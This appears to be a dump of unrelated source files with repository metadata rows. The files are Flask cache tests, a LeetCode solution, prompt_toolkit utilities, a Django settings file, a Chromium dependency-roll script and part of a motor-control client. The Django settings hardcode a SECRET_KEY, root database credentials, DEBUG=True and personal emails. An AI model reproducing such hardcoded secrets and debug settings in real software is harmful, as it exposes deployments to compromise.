def test_min_fresh(self):
# this test is raced; if running it takes about a second, it might fail
r = Response()
r.date = datetime.utcnow() - timedelta(seconds=100)
r.cache_control.max_age = 200
f = self.r.response_freshness_seconds(r)
with a.test_request_context('/foo', headers=(('cache-control', 'min-fresh=50'),)):
try:
self.r.verify_response_freshness_or_miss(r, f)
except CacheMiss:
self.fail('unexpected CacheMiss on reasonably fresh response')
with a.test_request_context('/foo', headers=(('cache-control', 'min-fresh=150'),)):
self.assertRaises(NotFreshEnoughForClient, self.r.verify_response_freshness_or_miss, r, f)
def test_request_cache_control_disobedience(self):
c = SimpleCache()
cfg = Config(request_controls_cache=False)
s = Store(c, cfg)
r = Retrieval(c, cfg)
with a.test_request_context('/foo', headers=(('cache-control', 'no-store'),)):
self.assertTrue(r.should_fetch_response())
with a.test_request_context('/foo', headers=(('cache-control', 'no-store'),)):
self.assertTrue(s.should_cache_response(Response()))
with a.test_request_context('/foo', headers=(('cache-control', 'no-store'),)):
self.assertTrue(s.should_cache_response(Response()))
resp = Response()
resp.date = datetime.utcnow() - timedelta(seconds=100)
resp.cache_control.max_age = 200
with a.test_request_context('/foo', headers=(('cache-control', 'min-fresh=150'),)):
f = self.r.response_freshness_seconds(resp)
try:
r.verify_response_freshness_or_miss(resp, f)
except CacheMiss:
self.fail('unexpected CacheMiss when ignoring request cache control')
def test_sequence_converted_responses(self):
with a.test_request_context('/foo'):
r = Response(f for f in 'foo')
r.make_sequence()
self.assertFalse(self.s.should_cache_response(r))
r = send_file(__file__)
r.make_sequence()
self.assertFalse(self.s.should_cache_response(r))
class RecacheTestCase(unittest.TestCase):
def setUp(self):
self.recached = False
def dispatcher(salt):
self.recached = True
self.c = SimpleCache()
cfg = Config(preemptive_recache_seconds=10, preemptive_recache_callback=dispatcher)
self.s = Store(self.c, cfg)
self.r = Retrieval(self.c, cfg)
def test_preemptive_recaching_predicate(self):
m = Metadata(HeaderSet(('foo', 'bar')), 'qux')
def mkretr(**kwargs):
return Retrieval(self.c, Config(**kwargs))
with a.test_request_context('/'):
self.assertFalse(mkretr(preemptive_recache_seconds=10).should_recache_preemptively(10, m))
self.assertFalse(mkretr(preemptive_recache_callback=lambda x: 0).should_recache_preemptively(10, m))
self.assertFalse(self.r.should_recache_preemptively(11, m))
self.assertTrue(self.r.should_recache_preemptively(10, m))
self.assertFalse(self.r.should_recache_preemptively(10, m))
self.c.clear()
self.assertTrue(self.r.should_recache_preemptively(10, m))
def test_preemptive_recaching_cache_bypass(self):
fresh = Response('foo')
with a.test_request_context('/foo'):
self.s.cache_response(fresh)
metadata = self.r.fetch_metadata()
with a.test_request_context('/foo'):
cached = self.r.fetch_response()
self.assertEquals(cached.headers[self.r.X_CACHE_HEADER], 'hit')
with a.test_request_context('/foo', headers={RECACHE_HEADER: metadata.salt}):
self.assertRaises(RecacheRequested, self.r.fetch_response)
with a.test_request_context('/foo', headers={RECACHE_HEADER: 'incorrect-salt'}):
try:
self.r.fetch_response()
except RecacheRequested:
self.fail('unexpected RecacheRequested for incorrect salt')
class UtilityTestCase(unittest.TestCase):
def setUp(self):
self.c = SimpleCache()
def test_werkzeug_cache_get_or_add_missing_key(self):
self.assertEquals('bar', werkzeug_cache_get_or_add(self.c, 'foo', 'bar', 10))
def test_werkzeug_cache_get_or_add_existing_key(self):
self.c.set('foo', 'bar')
self.assertEquals('bar', werkzeug_cache_get_or_add(self.c, 'foo', 'qux', 10))
| mit | -3,667,972,195,193,208,300 | 45.003559 | 117 | 0.61886 | false | 3.773205 | true | false | false |
eroicaleo/LearningPython | interview/leet/124_Binary_Tree_Maximum_Path_Sum.py | 1 | 1054 | #!/usr/bin/env python
from tree import *
class Solution:
def maxPathSum(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if root == None:
return 0
self.maxSum = root.val
self.maxPathSumNode(root)
return self.maxSum
def maxPathSumNode(self, node):
if node == None:
return 0
leftSum = self.maxPathSumNode(node.left)
rightSum = self.maxPathSumNode(node.right)
self.maxSum = max(leftSum+node.val, rightSum+node.val, leftSum+node.val+rightSum, self.maxSum, node.val)
print('leftSum: %d, rightSum: %d, node.val: %d, self.maxSum: %d' % (leftSum, rightSum, node.val, self.maxSum))
ret = max(leftSum+node.val, rightSum+node.val, node.val)
print('node.val: %d, ret: %d' % (node.val, ret))
return ret
sol = Solution()
nodeString = "[-10,9,20,null,null,15,7]"
nodeString = "[1,2,3]"
nodeString = "[1,-2,-3,1,3,-2,null,-1]"
root = treeBuilder(nodeString)
traverse(root)
print(sol.maxPathSum(root))
| mit | -2,902,822,416,752,697,000 | 30 | 118 | 0.598672 | false | 3.020057 | false | false | false |
niklasf/python-prompt-toolkit | prompt_toolkit/layout/utils.py | 1 | 2590 | from __future__ import unicode_literals
from prompt_toolkit.utils import get_cwidth
__all__ = (
'token_list_len',
'token_list_width',
'token_list_to_text',
'explode_tokens',
'find_window_for_buffer_name',
)
def token_list_len(tokenlist):
"""
Return the amount of characters in this token list.
:param tokenlist: List of (token, text) or (token, text, mouse_handler)
tuples.
"""
return sum(len(item[1]) for item in tokenlist)
def token_list_width(tokenlist):
"""
Return the character width of this token list.
(Take double width characters into account.)
:param tokenlist: List of (token, text) or (token, text, mouse_handler)
tuples.
"""
return sum(get_cwidth(c) for item in tokenlist for c in item[1])
def token_list_to_text(tokenlist):
"""
Concatenate all the text parts again.
"""
return ''.join(item[1] for item in tokenlist)
def iter_token_lines(tokenlist):
"""
Iterator that yields tokenlists for each line.
"""
line = []
for token, c in explode_tokens(tokenlist):
line.append((token, c))
if c == '\n':
yield line
line = []
yield line
def split_lines(tokenlist):
"""
Take a single list of (Token, text) tuples and yield one such list for each
line.
"""
line = []
for token, string in tokenlist:
items = string.split('\n')
for item in items[:-1]:
if item:
line.append((token, item))
yield line
line = []
line.append((token, items[-1]))
if line:
yield line
def explode_tokens(tokenlist):
"""
Turn a list of (token, text) tuples into another list where each string is
exactly one character.
:param tokenlist: List of (token, text) tuples.
"""
result = []
for token, string in tokenlist:
for c in string:
result.append((token, c))
return result
def find_window_for_buffer_name(layout, buffer_name):
"""
Look for a :class:`~prompt_toolkit.layout.containers.Window` in the Layout
that contains the :class:`~prompt_toolkit.layout.controls.BufferControl`
for the given buffer and return it. If no such Window is found, return None.
"""
from .containers import Window
from .controls import BufferControl
for l in layout.walk():
if isinstance(l, Window) and isinstance(l.content, BufferControl):
if l.content.buffer_name == buffer_name:
return l
| bsd-3-clause | 693,291,599,595,765,100 | 23.205607 | 80 | 0.602317 | false | 3.894737 | false | false | false |
devbitstudio/portfolio | settings.py | 1 | 5950 | # Django settings for devbitstudio project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DOMAIN = 'devbitstudio.com'
EMAIL_HOST = 'localhost'
EMAIL_PORT = 25
#~ DEFAULT_FROM_EMAIL = '[email protected]'
SERVER_EMAIL = '[email protected]'
EMAIL_SUBJECT_PREFIX = 'DevBitStudio - '
CURRENT_PATH = os.path.abspath(os.path.dirname(__file__).decode('utf-8'))
PROJECT_DIR = os.path.dirname(__file__)
RESULTS_PER_PAGE = 12
ADMINS = (
('William Ibarra Rodriguez', '[email protected]'),
('Miguel Pelfort Paz', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'devbitstudio', # Or path to database file if using sqlite3.
'USER': 'root', # Not used with sqlite3.
'PASSWORD': 'root', # Not used with sqlite3.
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(PROJECT_DIR, 'uploads/')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''#os.path.join(PROJECT_DIR, 'static/')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJECT_DIR, 'static/'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'iea9ivk!*ms-#$i%ix0i0b3p=u&30v+h*)&c5!%byv^i6^15%3'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'marketing.urlcanon.URLCanonicalizationMiddleware',
)
ROOT_URLCONF = 'devbitstudio.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(os.path.dirname(__file__),'templates').replace('\\', '/'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
'main',
'django.contrib.sitemaps',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
# for use with URL Canonicalization Middleware:
# this is the canonical hostname to be used by your app (required)
CANON_URL_HOST = 'devbitstudio.com'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| mit | -7,184,461,981,706,605,000 | 32.806818 | 120 | 0.689412 | false | 3.573574 | false | false | false |
ChromeDevTools/devtools-frontend | scripts/deps/roll_deps.py | 2 | 2410 | #!/usr/bin/env vpython
#
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Update manually maintained dependencies from Chromium.
"""
import argparse
import os
import shutil
import subprocess
import sys
# Files whose location within devtools-frontend matches the upstream location.
FILES = [
'v8/include/js_protocol.pdl',
'third_party/blink/renderer/core/css/css_properties.json5',
'third_party/blink/renderer/core/html/aria_properties.json5',
'third_party/blink/public/devtools_protocol/browser_protocol.pdl',
]
# Files whose location within devtools-frontend differs from the upstream location.
FILE_MAPPINGS = {
# chromium_path => devtools_frontend_path
'components/variations/proto/devtools/client_variations.js':
'front_end/third_party/chromium/client-variations/ClientVariations.js',
'third_party/axe-core/axe.d.ts': 'front_end/third_party/axe-core/axe.d.ts',
'third_party/axe-core/axe.js': 'front_end/third_party/axe-core/axe.js',
'third_party/axe-core/axe.min.js':
'front_end/third_party/axe-core/axe.min.js',
'third_party/axe-core/LICENSE': 'front_end/third_party/axe-core/LICENSE',
}
for f in FILES:
FILE_MAPPINGS[f] = f
def parse_options(cli_args):
parser = argparse.ArgumentParser(description='Roll dependencies from Chromium.')
parser.add_argument('chromium_dir', help='path to chromium/src directory')
parser.add_argument('devtools_dir',
help='path to devtools/devtools-frontend directory')
return parser.parse_args(cli_args)
def update(options):
subprocess.check_call(['git', 'fetch', 'origin'], cwd=options.chromium_dir)
subprocess.check_call(['git', 'checkout', 'origin/main'],
cwd=options.chromium_dir)
subprocess.check_call(['gclient', 'sync'], cwd=options.chromium_dir)
def copy_files(options):
for from_path, to_path in FILE_MAPPINGS.items():
from_path = os.path.normpath(from_path)
to_path = os.path.normpath(to_path)
print('%s => %s' % (from_path, to_path))
shutil.copy(os.path.join(options.chromium_dir, from_path),
os.path.join(options.devtools_dir, to_path))
if __name__ == '__main__':
OPTIONS = parse_options(sys.argv[1:])
update(OPTIONS)
copy_files(OPTIONS)
| bsd-3-clause | 2,989,384,766,150,173,000 | 36.076923 | 84 | 0.692946 | false | 3.347222 | false | false | false |
google/makani | avionics/motor/motor_client.py | 1 | 50178 | #!/usr/bin/python
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command line client for controlling motors."""
import collections
import os
import re
import socket
import subprocess
import tempfile
import threading
import time
import makani
from makani.avionics.common import actuator_types
from makani.avionics.common import aio
from makani.avionics.common import cmd_client
from makani.avionics.common import pack_avionics_messages
from makani.avionics.common import safety_codes
from makani.avionics.firmware.params import client as param_client
from makani.avionics.motor.firmware import config_params
from makani.avionics.motor.firmware import flags
from makani.avionics.network import aio_labels
from makani.avionics.network import aio_node
from makani.avionics.network import message_type
from makani.lib.python import c_helpers
import numpy as np
from scipy import interpolate
# TODO: implement NetworkConfig() to replace all these EnumHelper's.
aio_node_helper = c_helpers.EnumHelper('AioNode', aio_node)
motor_label_helper = c_helpers.EnumHelper('MotorLabel', aio_labels,
prefix='kMotor')
motor_error_helper = c_helpers.EnumHelper('MotorError', flags)
motor_warning_helper = c_helpers.EnumHelper('MotorWarning', flags)
def BuildMotorParamDict():
"""Builds a dict mapping motor param names to their indices."""
# Build up parameter list.
filename = os.path.join(makani.HOME, 'avionics/motor/firmware/io.c')
with open(filename) as f:
f_text = f.read()
# Get parameter array string.
re_string = r'static float \*g_mutable_param_addrs\[\] = {\s*^([\s\S]*)^};'
array_string = re.search(re_string, f_text, re.MULTILINE)
re_string = r'^ *&[\w\[\]]+.([\w\.\[\]]+)'
motor_param_keys = re.findall(re_string, array_string.group(0), re.MULTILINE)
return {key: ind for ind, key in enumerate(motor_param_keys)}
# Constants.
MOTORS = [mot.upper() for mot in motor_label_helper.ShortNames()]
CONTROLLER = 'kAioNodeControllerA'
OPERATOR = 'kAioNodeOperator'
MOTOR_PARAMS = BuildMotorParamDict()
MOTOR_ERROR_NAMES = collections.OrderedDict(
(error_bitmask, motor_error_helper.Name(error_bitmask))
for error_bitmask in motor_error_helper.Values()
if motor_error_helper.Name(error_bitmask) != 'kMotorErrorAll')
MOTOR_WARNING_NAMES = collections.OrderedDict(
(warning_bitmask, motor_warning_helper.Name(warning_bitmask))
for warning_bitmask in motor_warning_helper.Values()
if motor_warning_helper.Name(warning_bitmask) != 'kMotorWarningAll')
MOTOR_STATUS_NAMES = {val: key for key, val in flags.__dict__.items()
if key.startswith('kMotorStatus')}
GEN_TABLE_PATH = os.path.join(makani.HOME,
'avionics/motor/gen_lookup_table.py')
OMEGA_MIN_LIMIT = -260.0
OMEGA_MAX_LIMIT = 260.0
TORQUE_MIN_LIMIT = -600.0
TORQUE_MAX_LIMIT = 600.0
EPS32 = np.finfo(np.float32).eps
class MotorClientError(cmd_client.WingClientError):
pass
def MotorsAsBits(motor_list):
"""Returns a bitmask describing the motors in `motor_list`."""
return sum(1 << motor_label_helper.Value(motor.capitalize())
for motor in motor_list)
def AioNodeNameFromMotorNickname(motor):
"""Returns AIO node name for the specified motor."""
return 'kAioNodeMotor' + motor.capitalize()
def AioNodeNameFromDynoNickname(motor):
"""Returns AIO node name for the specified dyno motor."""
return 'kAioNodeDynoMotor' + motor.capitalize()
def GetMotorErrorNames(error_bitmask):
"""Returns a list of error names corresponding to the specified bitmask."""
return GetFlagNames(error_bitmask, MOTOR_ERROR_NAMES, 0)
def GetMotorWarningNames(warning_bitmask):
"""Returns a list of warning names corresponding to the specified bitmask."""
return GetFlagNames(warning_bitmask, MOTOR_WARNING_NAMES, 0)
def GetFlagNames(bitmask, bitmask_dict, default_key=None):
"""Returns a list based on bitmask_dict corresponding to set bits in bitmask.
Args:
bitmask: Integer containing a bitmask of desired fields.
bitmask_dict: Dictionary with power-of-two integer keys and values
containing names of the corresponding bits.
default_key: Key to use if bitmask == 0. Set to None to return [].
Returns:
A list with the values of bitmask_dict specified by bitmask.
"""
if bitmask:
return [name for bit, name in bitmask_dict.iteritems() if bit & bitmask]
else:
if default_key is None:
return []
else:
return [bitmask_dict[default_key]]
def GenerateCommandData(args):
"""Generates the data to use for a given speed or torque command.
Args:
args: List containing command input file & optional loop parameter.
Returns:
data: Numpy array of time, torque and speed limits.
loop: Boolean of optional loop parameter.
Raises:
MotorClientError: An invalid filename or file format was specified.
"""
cmd_file = args[0]
if not os.path.isfile(cmd_file):
raise MotorClientError('Invalid filename: %s' % cmd_file)
# Handle 1st arg i.e. the command file.
if cmd_file.endswith(('.py', '.pycmd')): # Treat as a Python file.
with tempfile.NamedTemporaryFile() as table_file:
popen = subprocess.Popen([GEN_TABLE_PATH, '--input_file', cmd_file,
'--binary'],
stdout=table_file, stderr=subprocess.PIPE)
_, stderr = popen.communicate()
if popen.returncode != 0:
raise MotorClientError('Generation of lookup table from %s failed. '
'stderr:\n%s' % (cmd_file, stderr))
data = np.load(table_file.name)
print 'Using %s to generate command profile.' % cmd_file
else: # Treat as a text file for interpolation.
try:
data = np.loadtxt(cmd_file)
except (IOError, ValueError):
raise MotorClientError(
'Invalid input text file: %s. Should contain a table of time, torques'
'and speed limits with rows of the form:\n\n'
'time torque1 torque2 ... torque8 omega_lower1 omega_lower2 ...'
'omega_lower8 omega_upper1 omega_upper2 ... omega_upper8' % cmd_file)
print 'Using interpolated values from %s for command profile.' % cmd_file
if data.shape[1] != 25:
raise MotorClientError(
'Invalid number of columns in command table. Expected 25, got %d. '
'Revise input file to generate rows of the form:\n'
'time torque1 torque2 ... torque8 omega_lower1 omega_lower2 ...'
'omega_lower8 omega_upper1 omega_upper2 ... omega_upper8'
% data.shape[1])
# Handle 2nd arg i.e. the optional parameter to repeat.
if len(args) == 1:
loop = False
print 'Defaulting to \"noloop\".'
else:
if args[1] == 'loop':
loop = True
elif args[1] == 'noloop':
loop = False
else:
raise MotorClientError('Invalid option: %s. Expecting \"loop\" or '
'[default] \"noloop\".' % args[1])
return data, loop
def CheckCommandLimits(
cmd_min, cmd_max, cmd_min_limit, cmd_max_limit, cmd_type):
if cmd_min < cmd_min_limit or cmd_max > cmd_max_limit:
raise MotorClientError('Extreme %s outside of limits [%f, %f] '
'detected. Command not set.' %
(cmd_type, cmd_min_limit, cmd_max_limit))
if cmd_min > cmd_max:
raise MotorClientError('Invalid %s i.e. min value - %f, is greater '
'than max value - %f' % (cmd_type, cmd_min, cmd_max))
class CommandProfile(object):
"""Maintains a lookup table of motor commands while running motors."""
def __init__(
self, t, motor_cmd, cmd_min_limit, cmd_max_limit, cmd_type,
loop_back=False):
self._loop_back = loop_back
self._t = t
self._motor_cmd_func = interpolate.interp1d(self._t, motor_cmd, axis=0)
cmd_max = np.max(motor_cmd)
cmd_min = np.min(motor_cmd)
print ('\nWith {t_start:.2f}s < t < {t_end:.2f}s:'
'\n min({type}) = {min:f}\n max({type}) = {max:f}\n'.format(
t_start=t[0], t_end=t[-1], type=cmd_type,
min=cmd_min, max=cmd_max))
CheckCommandLimits(cmd_min, cmd_max, cmd_min_limit, cmd_max_limit, cmd_type)
def __call__(self, t):
if self._loop_back:
t = np.mod(t, self._t[-1])
elif t > self._t[-1]:
return None
return list(self._motor_cmd_func(t))
class MotorCommandClient(cmd_client.WingCommandClient):
"""Command line client for running M600 motors."""
prompt = '(motor_client) '
_NUM_RETRIES = 10
_MOTORS = 'motors'
_DYNOS = 'dynos'
def __init__(self, *args, **kwargs):
cmd_client.WingCommandClient.__init__(self, *args, **kwargs)
self._motors_selected = set()
self._dynos_selected = set()
self._spin_dir = {}
self._motor_runner = Runner(self._motors_selected, self._spin_dir)
self._dyno_runner = Runner(self._dynos_selected, self._spin_dir,
dyno_mode=True)
self._motor_listener = None
self._dyno_listener = None
self._torque = 0.0
self._omega_lower_limit = 0.0
self._omega_upper_limit = 0.0
self._arm_aio_client = aio.AioClient(
['kMessageTypeMotorSetState', 'kMessageTypeDynoMotorSetState'],
timeout=0.1)
self._set_param_aio_client = aio.AioClient(
['kMessageTypeMotorSetParam', 'kMessageTypeDynoMotorSetParam'],
timeout=0.1)
# The long range radio requires at least 2x160 ms for a complete command-
# response cycle.
self._ack_param_aio_client = aio.AioClient(
['kMessageTypeMotorAckParam'], timeout=0.35)
self._get_param_aio_client = aio.AioClient(
['kMessageTypeMotorGetParam', 'kMessageTypeDynoMotorGetParam'],
timeout=0.1)
self._param_client = param_client.Client(timeout=0.1)
def TryStopThreads(self):
self._motor_runner.TryStop()
self._dyno_runner.TryStop()
if self._motor_listener:
self._motor_listener.TryStop()
if self._dyno_listener:
self._dyno_listener.TryStop()
def _GetListenerAndRunner(self, node_type):
if node_type == self._MOTORS:
return self._motor_listener, self._motor_runner
elif node_type == self._DYNOS:
return self._dyno_listener, self._dyno_runner
else:
raise MotorClientError('Unknown node type.')
def _CheckStatus(self, valid_statuses, node_type):
listener, _ = self._GetListenerAndRunner(node_type)
if not listener:
status = flags.kMotorStatusInit
else:
status = listener.GetMostRestrictiveMotorStatus()
if status not in valid_statuses:
raise MotorClientError(
'Invalid %s status. %s' % (
node_type.capitalize(), MOTOR_STATUS_NAMES[status]))
return True
def _CheckMotorStatus(self, valid_statuses):
self._CheckStatus(valid_statuses, self._MOTORS)
def _CheckDynoStatus(self, valid_statuses):
self._CheckStatus(valid_statuses, self._DYNOS)
def _CheckTargetsSelected(self):
if self._motors_selected or self._dynos_selected:
return True
else:
raise MotorClientError('Invalid set of targets. Use either: '
'"set_targets" or "set_targets_dyno".')
def _SetTargets(self, line, node_type):
"""Sets motor or dyno targets.
Args:
line: User supplied arguments specifying target motors.
node_type: String specifying type of targets i.e. 'motors' or 'dynos'.
Raises:
MotorClientError: An invalid set of targets was specified.
"""
targets_selected, _ = cmd_client.SelectArgs(
line.split(), MOTORS, require_some=True, require_all=True,
select_all=True, require_one=False)
if node_type == self._MOTORS:
self._motors_selected = targets_selected
motor_params = self._QueryConfig(self._motors_selected, self._MOTORS)
self._spin_dir = self._GetSpinDir(motor_params)
elif node_type == self._DYNOS:
self._dynos_selected = targets_selected
self._QueryConfig(self._dynos_selected, self._DYNOS)
self.TryStopThreads()
if self._motors_selected:
print 'Motors selected: %s.' % ', '.join(self._motors_selected)
self._motor_runner = Runner(self._motors_selected, self._spin_dir)
self._motor_listener = Listener(self._motor_runner.StopRun,
self._motors_selected)
if self._dynos_selected:
print 'Dynos selected: %s.' % ', '.join(self._dynos_selected)
self._dyno_runner = Runner(self._dynos_selected, self._spin_dir,
dyno_mode=True)
self._dyno_listener = Listener(self._dyno_runner.StopRun,
self._dynos_selected, dyno_mode=True)
@cmd_client.Command()
def do_set_targets(self, line): # pylint: disable=invalid-name
"""Sets motor targets e.g. "set_targets SBO SBI"."""
self._CheckMotorStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
self._SetTargets(line, self._MOTORS)
@cmd_client.Command()
def do_set_targets_dyno(self, line): # pylint: disable=invalid-name
"""Sets dyno targets e.g. "set_targets_dyno SBO SBI"."""
self._CheckDynoStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
self._SetTargets(line, self._DYNOS)
@cmd_client.Command()
def do_get_targets(self, line): # pylint: disable=invalid-name
"""Displays selected motor & dyno targets."""
print 'Current targets.\nMotors: %s.\nDynos: %s.' % (
', '.join(self._motors_selected), ', '.join(self._dynos_selected))
@cmd_client.Command()
def do_clear_targets(self, line): # pylint: disable=invalid-name
"""Clears selected motor & dyno targets."""
old_motors = self._motors_selected.copy()
old_dynos = self._dynos_selected.copy()
self.TryStopThreads()
self._motors_selected = set()
self._dynos_selected = set()
self._spin_dir = {}
self._motor_runner = Runner(self._motors_selected, self._spin_dir)
self._dyno_runner = Runner(self._dynos_selected, self._spin_dir,
dyno_mode=True)
self._motor_listener = None
self._dyno_listener = None
print 'Cleared old targets.\nOld Motors: %s.\nOld Dynos: %s.' % (
', '.join(old_motors), ', '.join(old_dynos))
def complete_set_targets(self, text, *unused_args): # pylint: disable=invalid-name
return self._CompleteArg(text, sorted(MOTORS) + ['All'])
complete_set_targets_dyno = complete_set_targets
def _GetSpinDir(self, params):
"""Determine the nominal spin direction based off of the motor load type."""
# List of props that need to spin in the positive x direction / in the
# negative omega sense.
# Additional loads are to be added in future commits.
reversed_loads = [config_params.MotorLoadType.PROP_REV2_POSITIVE_X]
return {key: -1 if param and param.load_type in reversed_loads else 1
for key, param in params.iteritems()}
def _QueryConfig(self, targets, target_type):
"""Test if targets are on the network and query their configurations."""
params = {}
for target in targets:
if target_type == self._DYNOS:
node = aio_node_helper.Value(AioNodeNameFromDynoNickname(target))
elif target_type == self._MOTORS:
node = aio_node_helper.Value(AioNodeNameFromMotorNickname(target))
section = param_client.SECTION_CONFIG
try:
params[target] = self._param_client.GetSection(node, section)
except socket.timeout:
params[target] = None
self._PrintConfig(targets, params)
return params
def _PrintConfig(self, motors, params):
"""Print portions of the selected motor config params."""
load_types = [load_type.CName()[len('kMotorLoadType'):]
for load_type in config_params.MotorLoadType.Names()]
motor_types = [motor_type.CName()[len('kMotorType'):]
for motor_type in config_params.MotorType.Names()]
load_type_max_str_len = max([len(name) for name in load_types])
motor_type_max_str_len = max([len(name) for name in motor_types])
for motor in sorted(motors):
if params[motor] is None:
print '%s: unknown' % motor
else:
print '{name}: motor_type: {motor_type} load_type: {load_type}'.format(
name=motor,
motor_type=(motor_types[params[motor].motor_type]
.ljust(motor_type_max_str_len)),
load_type=(load_types[params[motor].load_type]
.ljust(load_type_max_str_len)))
print ''
@cmd_client.Command()
def do_query_config(self, line): # pylint: disable=invalid-name
targets_selected, _ = cmd_client.SelectArgs(
line.split(), MOTORS, require_some=True, require_all=True,
select_all=True, require_one=False)
self._CheckMotorStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
self._QueryConfig(targets_selected, self._MOTORS)
@cmd_client.Command()
def do_query_config_dyno(self, line): # pylint: disable=invalid-name
targets_selected, _ = cmd_client.SelectArgs(
line.split(), MOTORS, require_some=True, require_all=True,
select_all=True, require_one=False)
self._CheckDynoStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
self._QueryConfig(targets_selected, self._DYNOS)
def _TryArm(self, arm_msg, arm_msg_type, node_type):
listener, _ = self._GetListenerAndRunner(node_type)
for _ in xrange(self._NUM_RETRIES):
self._arm_aio_client.Send(arm_msg, arm_msg_type, OPERATOR)
time.sleep(0.1)
if listener.AllMotorsArmed():
print 'Successfully armed %s.' % node_type
return
else:
raise MotorClientError('Failed to arm %s.' % node_type)
@cmd_client.Command(num_args=0)
def do_arm(self, unused_line): # pylint: disable=invalid-name
"""Arms the selected motors and/or dynos."""
if self._motors_selected:
self._CheckMotorStatus([flags.kMotorStatusInit])
if self._dynos_selected:
self._CheckDynoStatus([flags.kMotorStatusInit])
self._CheckTargetsSelected()
if self._motors_selected:
motor_arm_msg = pack_avionics_messages.MotorSetStateMessage()
motor_arm_msg.command = actuator_types.kActuatorStateCommandArm
motor_arm_msg.command_data = safety_codes.MOTOR_ARMING_SIGNAL
print 'Arming motors.'
motor_arm_msg.selected_motors = MotorsAsBits(
self._motor_listener.GetUnarmedMotors())
self._TryArm(
motor_arm_msg, 'kMessageTypeMotorSetState', self._MOTORS)
if self._dynos_selected:
dyno_arm_msg = pack_avionics_messages.DynoMotorSetStateMessage()
dyno_arm_msg.command = actuator_types.kActuatorStateCommandArm
dyno_arm_msg.command_data = safety_codes.MOTOR_ARMING_SIGNAL
print 'Arming dynos.'
dyno_arm_msg.selected_motors = MotorsAsBits(
self._dyno_listener.GetUnarmedMotors())
self._TryArm(
dyno_arm_msg, 'kMessageTypeDynoMotorSetState', self._DYNOS)
def _SetParam(self, line, message, node_type): # pylint: disable=invalid-name
"""Sets a param for a specified motor or dyno."""
targets, args = cmd_client.SelectArgs(
line.split(), MOTORS, require_some=True, select_all=True)
param, args = cmd_client.SelectArgs(
args, MOTOR_PARAMS.keys(), require_one=True, select_all=False)
if node_type == self._DYNOS:
